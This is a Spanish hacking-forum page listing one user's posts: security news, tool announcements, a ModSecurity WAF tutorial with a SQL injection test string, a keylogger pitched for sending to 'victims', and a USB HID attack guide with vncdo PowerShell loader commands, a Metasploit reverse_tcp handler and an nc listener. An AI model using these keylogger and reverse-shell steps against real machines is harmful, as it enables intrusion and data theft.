Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - d0r127

#1

Una base de datos con 1.400 millones de registros con nombres reales, direcciones de email, direcciones IP y a menudo direcciones postales ha sido expuesta en una de las mayores brechas de datos descubiertas en lo que llevamos de año. Ante tal cantidad de datos, hay muchas posibilidades de que tú, el lector, o alguien que conozcas haya sido afectado por esta exposición de datos.

El investigador en seguridad Chris Vickery, de MacKeeper, y Steve Ragan, de CSO Online, han descubierto un repositorio público expuesto y inseguro en la red con ficheros de respaldo relacionados con una importante organización de spam llamada River City Media (RCM).

La base de datos contiene información sensible sobre las operaciones de la empresa mencionada en el anterior párrafo, incluyendo los registros de 1.400 millones de usuarios. Esta base de datos está accesible para cualquiera que quiera acceder, incluso sin nombre de usuario y contraseña. Chris Vickery no ha dudado en señalar que RCM, la cual se considera a sí misma como una empresa de marketing legítima, como la responsable de enviar millones de mensajes no deseados (spam) al día a todo el mundo.


Además de más de mil millones de direcciones de correo electrónico, nombres reales, direcciones IP y, en algunos casos, direcciones postales, la filtración ha expuesto muchos documentos que revelan el funcionamiento interno de las operaciones de SPAM de RCM. Sin embargo, Vickery no ha sido capaz de verificar totalmente la filtración, aunque sí fue capaz de identificar direcciones correctas en la base de datos.

¿Son las operaciones de spam rentables? Por lo que se ha podido saber, RCM envía en un único día de actividad 18 millones de emails a direcciones de Gmail y 15 millones a direcciones de AOL, obteniendo por ello unos ingresos totales de unos 36.000 dólares.


RCM ha empleado técnicas ilegales
[/b]

La compañía ha empleado muchas técnicas de hacking ilegales para alcanzar a la mayor cantidad de usuarios posible. Una de las técnicas más destacadas ha sido descrita por los investigadores como ataques Slowloris, un método diseñado para que el spammer busque todas las conexiones abiertas posibles entre los clientes y los servidores de los servicios de email, aprovechándose de una configuración en el cliente que envía los paquetes de respuesta de forma lenta y fragmentada, a la vez que realiza constantemente peticiones para más conexiones.

No solo AOL y Gmail han sido afectados por esta técnica, ya que los investigadores también han visto que Microsoft, Apple, Salted Hash, Spamhaus y otras empresas también han sido atacadas mediante la misma técnica.

Este descubrimiento ya le está empezando a costar caro a RCM, ya que los investigadores denunciarán el caso ante las autoridades y Spamhaus pondrá a RCM en una lista negra dentro de su infraestructura de Registro de Operaciones de Spam Conocidas (ROKSO, Register of Known Spam Operations).

fuente:No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#2
Buenas underc0deanos aqui mora rafa, si el mismo rafa mora pa que me entienda, la verdad es que he estado un tiempo inactivo y he decidido volver, en esta ocasion os traigo un keylogger escrito en python.

Es un keylogger muy simple :)

Instalacion

Bueno pues descargamos la herramienta desde github, con el comando git clone No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Una vez descargada la ejecutaremos con sudo python No tienes permitido ver los links. Registrarse o Entrar a mi cuenta se nos abrirá un asistente de instalacion para las dependencias de la herramienta (puede tardar en torno a los 10-15min),una vez descargado todo quedara asi cuando ejecutemos la herramienta.


Con la "K" crearemos el keylogger,como veis no tiene mucho el programa,elegimos la opcion que queremos en este caso yo elegi la opcion 4,configuramos y quedaria de la siguiente manera


El fake presentantion

El fake presentantion

Ahora tendremos que mandar el keylogger a la victima y ejecutarlo en este caso yo hice la prueba con un Windows 7

Victima

Y aca estaran recogidos los datos enviados por gmail

Logs

Espero que os pueda servir :)

Un saludo biacheess
#3
Descripcion

WMD es una herramienta escrita en python con una colección de software de seguridad de TI. El software esta distribuido en módulos. Los módulos compuestos en Python puro y / o de terceros programas externos.

Funciones principales

1) Para usar un módulo adicional, ejecute el comando "use[module_call]", por ejemplo, "el uso apsniff", para activar el módulo.
2) Las opciones de los módulos se pueden cambiar con el "set [parámetros] [valor]".
3) Dentro de los módulos, siempre tienes la posibilidad de ver las opciones con el comando "so".
4) La configuración del medio ambiente está en núcleo / config.ini


Menú Web

Ejecuta el comando "www" en la consola para activar un servidor que muestra los módulos en su navegador. Podremos acceder a él desde: 127.0.0.1:5000.
Los módulos se cargan directamente en un xterm.


Módulos




Ejecutar

Antes de su primera ejecución, por favor realice los siguientes pasos:

1.-Ajuste la configuración de entorno en core/config.ini.default
2. Cambia el nombre de core/config.ini.default a core/config.ini

Ejecutar en la consola: python3 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Ejecuta un solo modulo: python3 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta -m [CALL]

Ejecutar el servidor web: python3 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta -w

Ejecutar sin los requisitos: python3 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta -nc

Puedes descargar la herramienta No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


fuente:kitploit
#4

Phineas Fisher,  también conocido como Hack Back!, la persona y activista que hackeó y filtro 400GB de la empresa italiana Hacking Team, a Gamma Group, y la web del Sindicato de Mossos d'Esquadra (SME), donó 25 Bitcoin (unos 11.000$) a una campaña de crowdfunding de un grupo Anti-ISIS, entre otros actos y además explicó cómo lo hizo, ha sido detenida en España. Se ha efectuado una detención en Salamanca y un registro en el barrio de Sants de la ciudad de Barcelona.


Actualización: Horas después de que las noticias de los arrestos y las incursiones fueron informados, Phineas Fisher, utilizando la misma dirección de correo electrónico que habían estado utilizando durante los últimos meses, envió un correo electrónico alegando que todavía estaba en libertad.

"Creo que los Mossos sólo arrestaron a algunas personas por hacer un retweet del enlace a su información personal, o tal vez sólo arrestó a algunas personas activistas / anarquistas para fingir que están haciendo algo", dijo Phineas Fisher, o alguien que está en control de su dirección de correo electrónico, En un correo electrónico compartido por una fuente que pidió permanecer en el anonimato.

Phineas Fisher añadió que sería mejor compartir esta información "por lo que no se inicia un montón de teorías acerca de mi desaparición".

La Policía Nacional y los Mossos registran dos domicilios, uno en Salamanca y otro en Barcelona, en una operación conjunta dirigida por el juzgado de instrucción 33 de Barcelona

La operación la dirige la titular del juzgado de instrucción 33 de Barcelona, Elisabet Castelló. El operativo se extiende en Salamanca y en Barcelona. Los agentes de la Policía Nacional han practicado una entrada y registro en un domicilio de Salamanca donde se ha producido la detención. Y en Barcelona, efectivos de los Mossos también registran un inmueble del barrio de Sants, según ha avanzado la Directa. 

Los Mossos podrían haber encontrado a quién se escondía detrás del seudónimo Phineas Fisher, la persona o grupo que reivindicó eel ataque informático en la web del Sindicato de Mossos ( SME) y la filtración en mayo de datos personales -incluyendo la dirección- de 5.540 policías. 

Según ha avanzado el quincenal 'Directa' y han confirmado a la ARA fuentes del cuerpo, la Policía Nacional española, con el apoyo de los Mossos, ha hecho una detención en Salamanca. La policía catalana también está registrando ahora mismo un domicilio en el barrio de Sants de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta operación está en marcha, bajo secreto de sumario y se esperan más detenciones. Las fuentes oficiales de los Mossos sólo confirman que tiene relación con el ataque informático y la difusión de los datos personales de los agentes. Fuentes con acceso a la investigación afirman que la operación es directamente contra los autores del ataque más que contra usuarios de Twitter que redifundir el enlace con los datos personales de los policías.Phineas Fisher, ya sea un grupo o un individuo, también había reivindicado una serie de impactantes ataques informáticos a objetivos como las empresas internacionales de software espía Hacking Team y Gama Group y últimamente había empezado a acumular seguidores: hace unas semanas se reivindicó en nombre del ataque informático en la web de las conferencias del influyente club Bilderberg.


egún el periódico español ARA, que rompió la historia hace unas horas, la policía dijo que arrestaron a Phineas Fisher en Salamanca, pero también están buscando en el barrio de Sants en Barcelona más sospechosos, que sospechan que trabajaron con Fisher.

Phineas Fisher era buscado en España después de hackear el sindicato de la policía catalana y filtrar los datos


Phineas Fisher se convirtió en un hombre buscado en España después de quebró y filtró datos de Sindicato de Mossos de Esquadra (SME), la unión de la policía catalana de España, en mayo de 2016.

El incidente atrajo la atención mundial después de que Phineas Fisher publicara un video de 39 minutos del hack completo, detallando cómo obtuvo acceso, cómo robó los datos y cómo lo publicó en línea.

Phineas Fisher ganó fama internacional después de haber hackeado el Gamma Group en 2014 y luego el Hacking Team en 2015, dos compañías que vendieron software de vigilancia (spyware) a gobiernos de todo el mundo, incluyendo muchos regímenes opresivos.

El hacker filtró datos confidenciales de ambas compañías, exponiendo las comunicaciones internas, las herramientas de hacking, las hazañas y el código fuente de su software de vigilancia.

Al igual que en el caso de SEM, Phineas Fisher publicó una cuenta paso a paso sobre cómo hackeó Hacking Team.

Phineas Fisher también hackeó el partido gobernante AKP de Turquía, desde donde robó 300.000 correos electrónicos y más de 500.000 documentos, que posteriormente pasó a WikiLeaks.

Phineas Fisher se escondió a inicios de año

Phineas Fisher parece haber oscurecido desde el comienzo del año, después de que el hacker eliminó su perfil de Reddit (donde él estaba muy activo) y todos los tweets de su cuenta de Twitter, según el reportero de vice Lorenzo Franceschi-Bicchierai.


fuente:redeszone.net
#5

Durante el pasado año, el ransomware ha sido una de las formas de malware más preocupantes para la seguridad informática, y respecto a este tipo de amenaza lo más frecuente es que la veamos en sistemas informáticos de uso personal o profesional, pero limitado a ordenadores. Es decir, el ransomware más frecuente infecta ordenadores de sobremesa y portátiles para 'bloquear información sensible' y pedir un rescate informático por su 'desbloqueo' –en forma de cifrado-. Pero ya ha tenido lugar el primer ransomware para hoteles, que lo que hace es bloquear la puerta de las habitaciones solicitando a la cadena hotelera que pague por la apertura para 'liberar' a los clientes.

Los hoteles y apartamentos turísticos han estado adoptando en los últimos años, y cada vez más, sistemas informáticos complejos para el control de la apertura y cierre de sus puertas. Ya prácticamente no existen las llaves 'clásicas' de metal para los hoteles, apartamentos y demás, sino que se trata de llaves magnéticas que son configuradas desde un sistema principal, y que además pueden ser bloqueadas y desbloqueadas desde un ordenador. A priori, esto debería dar una mayor seguridad y también flexibilidad al hotel para configurar las llaves en forma de tarjeta, pero también ha abierto una brecha para los 'hackers' informáticos.

Un malware puede bloquear las puertas de hoteles; para desbloquearlas se solicita un rescate económico

Ya no se trata de 'jugar' con el valor de archivos informáticos de contenido sensible, sino directamente con la presión que supone para una cadena hotelera mantener rehenes –porque se pueden perfectamente llamar así- encerrados en sus habitaciones. Le ha ocurrido a un hotel de cuatro estrellas, el Romantik Seehotel Jaegerwirt, en Austria, que tuvo que pagar 1.500 euros en Bitcoin para poder 'liberar' a sus clientes, que habían sido encerrados en sus habitaciones después de que un grupo de 'hackers' informáticos vulnerase su sistema informático. Según han contado medios locales, las puertas quedaron completamente bloqueadas y el bloqueo no se deshizo hasta que efectuaron el pago requerido.


Igual que tomaron control de las llaves electrónicas, los atacantes también se apoderaron del sistema de reservas al completo, todos los ordenadores conectados en red y un largo etcétera de sistemas auxiliares. Exactamente igual que con el ransomware al que estamos acostumbrados, el pago se solicitan en Bitcoin para dificultar la identificación de los atacantes, y en este caso concreto desde el hotel ha contado que se dejó una puerta trasera para hacer posible un segundo ataque que, sin embargo, fue frustrado porque se mejoró el sistema de seguridad como respuesta inmediata al primer ataque, por el que sí tuvieron que pagar esos 1.500 euros.



fuente:adslzone.net
#6


El pirata informático apodado WauchulaGhost, conocido por 'hackear' las cuentas de terroristas del Estado Islámico, le ha dado una lección a Trump acerca de la seguridad cibernética.

Un 'hacker' apodado WauchulaGhost ha advertido al presidente de Estados Unidos, Donald Trump, sobre una grave vulnerabilidad en su cuenta de Twitter, así como en la de su esposa y el vicepresidente del país, lo que pone en peligro su privacidad.

"Cambien sus correos electrónicos y arreglen los ajustes de configuración", aconsejó el pirata informático en un tuit acompañado por supuestos correos de Melania Trump, el portavoz de la Casa Blanca, Sean Spicer, y el asistente de Trump, Dan Scavino. El correo electrónico del mandatario estadounidense tampoco sería difícil de adivinar partiendo de los datos que descubrió el 'hacker'


Según sus explicaciones a la CNN, la vulnerabilidad se debe a la falta de ajustes básicos de seguridad que requieren la introducción de un número de móvil o un correo electrónico para restablecer la contraseña. Asimismo, basta con dar al botón 'He olvidado la contraseña' e introducir el nombre de la cuenta (@POTUS para la cuenta de Trump) para que aparezcan los correos electrónicos relacionados con la cuenta en versión encriptada, a los que se envía un enlace para el restablecimiento de la contraseña. 

"No resulta complicado descifrar aquel correo electrónico", señaló WauchulaGhost, quien afirma haber 'hackeado' más de 500 cuentas de terroristas del Estado Islámico.


fuente:actualidad.rt.com

#7

Un pirata informático ruso buscado por el FBI por acusaciones de piratería fue detenido y encarcelado en España a principios de esta semana, mientras que una decisión sobre su extradición a los Estados Unidos aún no se ha hecho.
La Guardia Civil, los agentes españoles de la agencia de aplicación de la ley, ha detenido a 32 años de edad, Stanislav Lisov en Barcelona-El Prat en base a una orden de detención internacional emitida por la Interpol a petición del FBI.
Lisov es arrestado bajo sospecha de creación y funcionamiento de la NeverQuest troyanos bancarios , un malware desagradable que dirige las instituciones financieras en todo el mundo y causó un daño estimado de $ 5 millones.
La detención se realizó después de las agencias de inteligencia de Estados Unidos encontraron que los piratas informáticos rusos estaban detrás de la edición de noviembre el año 2016 elecciones hacks que posiblemente influyó en la elección presidencial a favor de Donald Trump.


Sin embargo, la policía española hizo una declaración oficial, diciendo que el FBI había solicitado la detención de Lisov después de una investigación que comenzó en 2014.
troyano bancario NeverQuest siempre defraudadores acceso a las computadoras de las personas y las instituciones financieras para robar los datos bancarios.
El troyano que se propaga a través de protocolos de redes sociales, correo electrónico y transferencia de archivos, puede modificar el contenido de sitios web de banca e inyectar formas deshonestos en estos sitios, permitiendo a los atacantes robar credenciales de acceso de los usuarios.


NeverQuest también puede permitir a los atacantes maliciosos para tomar el control de un equipo comprometido a través de un servidor Virtual Network Computing (VNC) y luego usar esas computadoras para iniciar sesión en el banco en línea de la víctima y llevar a cabo el robo.
"Una investigación a fondo de los servidores operados por Lisov en Francia y Alemania reveló bases de datos con listas robadas de información de cuentas de las instituciones financieras, con datos que indican, entre otras cosas, saldos de cuentas," el español dijo Guardia Civil viernes.
"Uno de los servidores alquilados por Lisov contenían archivos con millones de credenciales de acceso, incluyendo nombres de usuario, contraseñas y preguntas y respuestas de seguridad, para las cuentas bancarias y sitios Web financiero".
Lisov los informes, trabaja como administrador de sistemas y desarrollador web para una compañía local en Taganrog, Rusia.
El hacker ruso se celebra bajo observación por las autoridades de la región nororiental de Cataluña ante el Tribunal Supremo de España decide si extraditarlo a Estados Unidos.



fuente:thehackernews.com

#8

Descripcion

ModSecurity es un módulo para servidores HTTP cuyo propósito es reforzar la seguridad de las aplicaciones Web. Es efectivamente un sistema de prevención y detección de intrusos para servidores Web.

ModSecurity es un firewall a nivel aplicación (WAF, web application firewall) implementado como un módulo para diferentes servidores HTTP (Apache, NGINX y Microsoft IIS) multiplataforma de código abierto (open source). Esta herramienta permite ganar visibilidad dentro del tráfico HTTP(S) y provee un lenguaje de reglas y una API para implementar protecciones avanzadas. Esto significa que es posible filtrar tráfico HTTP, directamente en el servidor Web, según el contenido de las peticiones de los clientes, lo cual permite detectar y bloquear ataques de tipo XSS (Cross Site Scripting), SQLi (SQL injection), session hijacking, etc

Caracterisitcas

-Capacidad de log y filtrado.
-La auditoira del log  permite almacenar el detalle de cada petición en un archivo de log, incluyendo los payloads de los POST -HTTP.
-Los pedidos entrantes a su vez pueden ser analizados, y los pedidos ofensivos rechazados (o simplemente registrados en el log, de acuerdo a cómo se configure)

Instalacion

Código: text
apt-get install libapache2-modsecurity


SI NOS ENCONTRAMOS ANTE ESTE ERROR:
Código: text
(EAI 5)No address associated with hostname: mod_unique_id: unable to find IPv4 address of


Esto es a causa de que ModSecurity requiere del módulo mod_unique_id el cual construye magic tokens a partir del hostname. Si se deshabilita el módulo mod_unique_id (a2dismod unique_id && service apache2 start), el servidor Apache inicia normalmente, pero por supuesto es necesario mantener este módulo habilitado para poder utilizar ModSecurity.

Para solucionar este problema existen dos alternativas: asignar un nombre de host que resuelva a una dirección IP; o hacer que el nombre de host resuelva a una dirección IP. Para que el nombre de host actual resuelva a una dirección IP no es necesario meter mano en servidores DNS, sólo basta con que el nombre de host resuelva localmente. Para ello basta con fijar la dirección IPv4 del host en la tabla de configuración estática de búsqueda para nombres de host (dentro del archivo /etc/hosts):

Código: text
vi /etc/hosts


Por ejemplo, si el nombre de host inválido es "mywebserver", fijarlo para que resuelva a localhost:

Código: text
127.0.0.1 localhost mywebserver


Luego iniciar Apache:
Código: text
 service apache2 start


Código: text
root@debian7# apachectl -M 2>/dev/null | grep security
security2_module (shared)


En este punto queda ModSecurity correctamente instalado. Ahora resta configurarlo y ponerlo en funcionamiento, la parte más difícil. Tal como mencioné al comienzo del artículo, ModSecurity trabaja utilizando reglas para la detección y filtrado de diferentes tipos de ataques, las cuales se definen utilizando un lenguaje propio. Por defecto incluye un conjunto de reglas genéricas mantenidas por la comunidad OWASP, las cuales son liberadas de manera gratuita y protegen contra los ataques básicos. Pero también existen reglas comerciales desarrolladas por Trustwave SpiderLabs que protegen contra ataques más avanzados, como Botnets, DoS y backdoors, entre otros. Por supuesto es posible desarrollar nuestras propias reglas a medida, pero para ello es necesario contar con un elevado conocimiento sobre ataques y protocolos.

Configuración de ModSecurity

El módulo mod-security posee un archivo de configuración mod-security.conf dentro del directorio /etc/apache2/mod-available/, el cual incluye todo archivo con extensión .conf que se encuentre dentro del directorio /etc/modsecurity/:

Citarroot@debian7# cat /etc/apache2/mods-available/mod-security.conf
<IfModule security2_module>
        # Default Debian dir for modsecurity's persistent data
        SecDataDir /var/cache/modsecurity

        # Include all the *.conf files in /etc/modsecurity.
        # Keeping your local configuration in that directory
        # will allow for an easy upgrade of THIS file and
        # make your life easier
        Include "/etc/modsecurity/*.conf"
</IfModule>

Durante la instalación de ModSecurity se incluye un archivo de configuración de ejemplo, modsecurity.conf-recommended,dentro de este directorio /etc/modsecurity/, el cual inicialmente no es incluido por no tener extensión .conf:

Citarroot@debian7# ls -l /etc/modsecurity/
total 8
-rw-r--r-- 1 root root 7453 Jul 25  2014 modsecurity.conf-recommended

Copiamos el archivo de configuración de ejemplo:
Código: text
cd /etc/modsecurity/
cp modsecurity.conf-recommended modsecurity.conf


Luego, editar el archivo:

Código: text
vi mod-security.conf

Por defecto, deshabilitar ModSecurity completamente (SecRuleEngine Off), ya que sólo será habilitado en VirtualHosts específicos:

Código: text
SecRuleEngine DetectionOnly
SecRuleEngine Off


Las reglas genéricas (OWASP ModSecurity CRS) que se incluyen con el paquete se encuentran en el directorio /usr/share/modsecurity-crs/:

Código: text
cd /usr/share/modsecurity-crs/


Dentro del mismo existen subdirectorios que organizan las reglas en diferentes tipos (base, activadas, experimentales, etc.). El directorio activated_rules está pensado para trabajar con links simbólicos de la misma forma que los directorios mods-enabled y sites-enabled de Apache (en Debian y derivados).

Pero, para diferenciar las reglas en testing de las reglas en producción (pensando a futuro), es necesario crear un directorio aparte para las reglas en testing:

Código: text
cp -a activated_rules/ activated_rules-testing

Para habilitar una regla, basta entonces con crear un enlace simbólico en activated_rules (producción) o activated_rules-testing (testing). Habilitar la regla de detección de ataques SQLi en testing para probar ModSecurity:

Código: text
cd activated_rules-testing/
ln -s ../base_rules/modsecurity_crs_41_sql_injection_attacks.conf
.

Hasta este punto, a pesar de que el módulo mod-security está habilitado, ModSecurity está configurado como apagado (SecRuleEngine Off). El siguiente paso consiste en editar el VirtualHost de testing a fin de habilitar ModSecurity en modo "DetectionOnly" (sólo en testing, de esta forma seguirá deshabilitado en producción):

Código: text
nano /etc/apache2/sites-available/testing.linuxito.com

Agregar el siguiente contenido dentro de la definición del VirtualHost:
       
Citar# ModSecurity
        <IfModule security2_module>
      SecRuleEngine DetectionOnly
      Include "/usr/share/modsecurity-crs/*.conf"
      Include "/usr/share/modsecurity-crs/activated_rules-testing/*.conf"
        </IfModule>

La primera línea de configuración habilita ModSecurity en modo "DetectionOnly". Esto significa que los ataques son detectados y registrados en el log de auditoría, pero no son bloqueados/filtrados.

La siguiente línea se utiliza para incluir el archivo /usr/share/modsecurity-crs/modsecurity_crs_10_setup.conf, el cual posee las directivas de configuración que controlan al conjunto de reglas genéricas de OWASP ModSecurity CRS.

Por último, se incluyen todos los archivos dentro del directorio que contienen las reglas /usr/share/modsecurity-crs/activated_rules-testing/, los cuales son links simbólicos a reglas habilitadas.

Finalmente, se debe recargar la configuración de Apache para que estas modificaciones surjan efecto:

Código: text
service apache2 reload


Prueba de ModSecurity

Teniendo ModSecurity habilitado en testing en modo "DetectionOnly", realizar una prueba simple de SQLi para verificar su funcionamiento (es decir, que se registre en el log de auditoría el intento de ataque). A modo de ejemplo, el vector de ataque que utilizo es simplemente:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta' or '1'='1
En el archivo de configuración de ejemplo de ModSecurity se indica que el archivo de log de auditoría es /var/log/apache2/modsec_audit.log. Seguir las modificaciones sobre dicho archivo con la herramienta tail:

Código: text
tail -f /var/log/apache2/modsec_audit.log

Se observa que, luego de enviar el vector de ataque desde un navegador, se registra el siguiente evento:

CitarMessage: Rule 7f548f412280 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules-testing/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null).
Message: Warning. Pattern match "(?i:([\\s'\"`\xc2\xb4\xe2\x80\x99\xe2\x80\x98\\(\\)]*)?([\\d\\w]+)([\\s'\"`\xc2\xb4\xe2\x80\x99\xe2\x80\x98\\(\\)]*)?(?:=|<=>|r?like|sounds\\s+like|regexp)([\\s'\"`\xc2\xb4\xe2\x80\x99\xe2\x80\x98\\(\\)]*)?\\2|([\\s'\"`\xc2\xb4\xe2\x80\x99\xe2\x80\x98\ ..." at ARGS:var. [file "/usr/share/modsecurity-crs/activated_rules-testing/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2.2.5"] [msg "SQL Injection Attack"] [data " '1'='1"] [severity "CRITICAL"] [tag "WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"]



fuente:linuxito.com

#9
/center]

Descripcion

Wireless IDS es una herramienta de código abierto escrita en Python. Esta herramienta va a olfatear(sniffear) el tráfico del aire que rodea a las actividades sospechosas como WEP / WPA / WPS a la hora atacar paquetes.

Hara lo siguiente:

-Detectar desautentificación en masa enviado al cliente / punto de acceso, que indican cantidad razonable posible ataque WPA para el handshake
-Continua el envío de datos al punto de acceso a través de dirección MAC, la cual indica la posibilidad de ataques WEP,
-Una cantidad razonable en la comunicación entre el cliente inalámbrico y punto de acceso mediante la autenticación EAP que indican la posibilidad de un ataque de fuerza bruta por WPS atracador / WPSCrack
-La detección de cambios en la conexión con los punto de acceso que puede tener la posibilidad de conexión con AP no autorizados.

Requisitos

Acceso de root (administrador)
interfaz inalámbrica que es capaz de monotorizar
Python 2.6> instalado
Aircrack-NG suite instalado
instalado TShark
Nota: Todas las aplicaciones 3-5 vienen ya pre-instaladas en Backtrack Linux y Kali.


Detección

Los ataques detectados WEP posibles

Si hay posibles ataques WEP detectados, se mostrará el cliente / Dirección MAC del punto de acceso inalámbrico (AP Nombre), así como cualquier solicitud de autenticación / asociación de entradas.


Los ataques detectados WPA posibles

Si hay posibles ataques detectados WPA, se mostrará el cliente / punto de acceso inalámbrico de direcciones MAC (Nombre AP) que se detectó el número de paquetes de deautenticación.
Si también se detectaron handshake, se mostrará el número de paquetes handshake que se encuentran.

[

Detectado posibles ataques WPS

-Cada vez que una comunicación entre un cliente inalámbrico y el punto de acceso mediante la autenticación EAP, sus direcciones MAC se mostrará con el número de paquetes EAP fueron detectados.
-Si hay una comunicación consistente de dicha solicitud, es probable que un WPS fuerza bruta está en curso.


Los cambios detectados en las conexiones de clientes a otro punto de acceso

El script también detecta ningún cambio cuando un cliente inalámbrico que se conecta inicialmente a un punto de acceso posteriormente cambiar la conexión a otro punto de acceso, lo que podría tener la posibilidad de conexión de un Rogue AP (El usuario también debe tener en cuenta el nombre AP)


Puedes descargar la herramienta No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Espero que os pueda servir :)

Un saludo biachees :)
#10
Hacking / Universal Serial aBUSe
Enero 14, 2017, 09:08:17 AM
Buenas a todos y a todas, aqui rafa mora, queria compartiros esta herramienta :)

Universal Serial aBUSe


Descripcion

Universal Serial aBUSe es un proyecto lanzado en la Defcon 24 por Rogan Dawes. El equipo tuvo algunos ataques bastante comunes (teclados falsos en pequeños dispositivos USB que escriben cosas desagradables) y los extendió a proporcionarnos un canal binario bidireccional sobre nuestra propia red wifi para darnos acceso remoto independiente de la red del host. Esto nos da varias mejoras con respecto a los ataques de estilo tradicional "Rubber Ducky".

-Podemos desencadenar el ataque cuando queremos.
-No utilizamos la red del anfitrión. Sin problemas en exfil, o potencial para la captura de NIDS.
-Un montón de trabajo se pueden mover al hardware, lo que da menos para cosas como AV para activar o equipos DFIR de encontrar.
-No se muestra como un adaptador de red, nuestra tubería binario es un dispositivo inocuo, por lo que es más difícil de detectar.

Caracteristicas ingeniosas

-Utiliza un raton jiggler para evitar que el protector de pantalla se active (pero sin ningún movimiento visible del ratón)
-Las cargas útiles optimizadas se ocultan de un usuario en su activación de 4s
-La capacidad para integrar tu payload favorito.

Instalacion

Este repositorio tiene una serie instrucciones y código para construir el firmware y el software de.Comenzamos descargando el proyecto de github.

Código: text
git clone --recursive https://github.com/sensepost/USaBUSe


Si desea ejecutar sólo los ataques, entonces no es necesario clonar todos los submódulos. La última versión ( No tienes permitido ver los links. Registrarse o Entrar a mi cuenta ) tendrá firmware precompilado. Después solo necesitas:

-esptool para actualizar el firmware
-vncdotool para ejecutar la interacción automatizada en el cliente.
-los scripts de este repositorio para las cargas útiles.

Programacion del firmware

Código: text
cd vncdotool

Código: text
python setup.py install


ACLARACION: vncdotool solo es compatile con Python2.7

Código: text
vncdo -s esp-link.lan -p password type "echo hello" key enter


Un ejemplo mas completo
Código: text
vncdo -s esp-link.lan -p password key alt-r pause 1 type powershell key enter pause 1 typefile powershell/read_exec.ps1


Si esp-link.lan no resuelve, busque el puerto 23 y 5900 en la red local, o consultar su servidor DHCP.

La interacción con la interfaz HID genérico requiere que el código del lado víctima encontrada bajo el powershell / directorio, así como el código del lado del atacante que se encuentra en No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.

Una demostración de un completo, ataque de extremo a extremo se puede encontrar en No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

En resumen, la forma en que funciona es que el atacante usar VNC para escribir a máquina una carga útil stage0 (utilizando actualmente PowerShell), que tiene sólo inteligencia suficiente para abrir el canal de mayor ancho de banda (en la actualidad sólo HID Genérico se implementa), y la carga y ejecutar una carga útil stage1 más complicado. Hay un par de cargas útiles stage1 implementado actualmente:

-spawn.ps1 - cmd.exe Ejecutar, y el tubo de salida estándar / stderr sobre el dispositivo, mientras que la lectura del dispositivo, y la escritura que a la entrada estándar del proceso.
-screenshot.ps1 - tomar una captura de pantalla del escritorio, y enviarlos a través del dispositivo.
-msf_proxy.ps1 - abrir un socket TCP en localhost: 65535, y la retransmisión de datos de ida y vuelta sobre el dispositivo. En un hilo separado, invocar el paso del cargador Metasploit, la conexión a localhost: 65535. Esto se puede utilizar para ejecutar un msfconsole ventanas / cáscara / reverse_tcp o incluso (con un poco de paciencia!) Una completa ventanas / meterpreter / reverse_tcp.

La paciencia es necesaria debido a que el dispositivo USB no tiene particularmente alto ancho de banda. HID Genérico se limita a 64 KB / s, y la UART entre los dos microprocesadores se limita a 250kbps (25KBps), pero otras limitaciones (muchos de ellos probablemente debido a la aplicación ingenua!) Nos limitar aún más! Actualmente, estamos alcanzando aproximadamente 4KBps.

Parches para mejorar la velocidad (y cualquier otro aspecto del sistema) son bienvenidos!

Una vez que la carga útil básica stage0 ha sido escrito a máquina a través de VNC, la segunda etapa se envía a través de la interfaz genérica HID (sólo la aplicación en la actualidad).

read_exec.ps1 espera recibir la próxima etapa en el siguiente formato:

Código: text
<stage length high byte><stage length low byte><powershell stage>


El script de shell incluidos No tienes permitido ver los links. Registrarse o Entrar a mi cuenta se encarga de este proceso para usted.

¡Nota! Hay un sueño importante incluida entre el envío de la segunda etapa, y la conexión de la toma de corriente al punto extremo final (msf, etc). La razón de esto es que la segunda etapa puede no terminar en un límite de 63 bytes, y si el punto final empieza a enviar los datos antes de tiempo, algunos de los que los datos pueden terminar "lleno" en el espacio vacío en el último paquete de la stage2 carga útil. Actualmente, el cargador stage0 no tiene ningún mecanismo para mantener estos datos para su uso posterior en la segunda etapa, y es descartado. La introducción de un sueño se asegura de que todos los datos desde el punto final no se llenan con la carga útil stage2, y evita la corrupción de datos.

El uso de Metasploit Framework

El guión No tienes permitido ver los links. Registrarse o Entrar a mi cuenta actual espera conectar a un oyente que se ejecuta en el puerto 4444 en el servidor local. Exactamente qué tipo de detector que debe ser depende de la secuencia de comandos stage1 que se envió. Si envía spawn.ps1, el oyente puede ser un simple "nc -l -p 4444". Si va a enviar msf_proxy.ps1, el oyente debe ser un msfconsole debidamente configurado. Usted puede elegir su carga útil como desee, de entre el grupo de cargas útiles que hacen uso de una conexión por etapas / reverse_tcp.

Por ejemplo:

Código: text
./msfconsole
use exploit/multi/handler
set payload windows/shell/reverse_tcp
set LHOST 0.0.0.0
set LPORT 4444
exploit


NOTA:No establezca LHOST a 127.0.0.1, se trata de un "número mágico" interno utilizado por Metasploit para sus propios fines. Las cosas se rompen al azar si lo hace! xDD

Construyendo el firmware AVR

OS X también puede obtener el compilador AVR mediante la instalación de la aplicación Arduino, por ejemplo Caskroom / barril / Arduino

Linux puede instalar usando apt-get:

Código: text
sudo apt-get install gcc-avr avr-libc avrdude


Una vez instaladas las herramientas de avr y avr-gcc está en su PATH, compilar los firmwares avr

Código: text
cd avr
make


Esto debe construir dos firmwares, Program_ESP y KeyboardMouseGeneric. es decir, debe tener archivos .hex en cada directorio.

Construyendo el firmware ESP8266

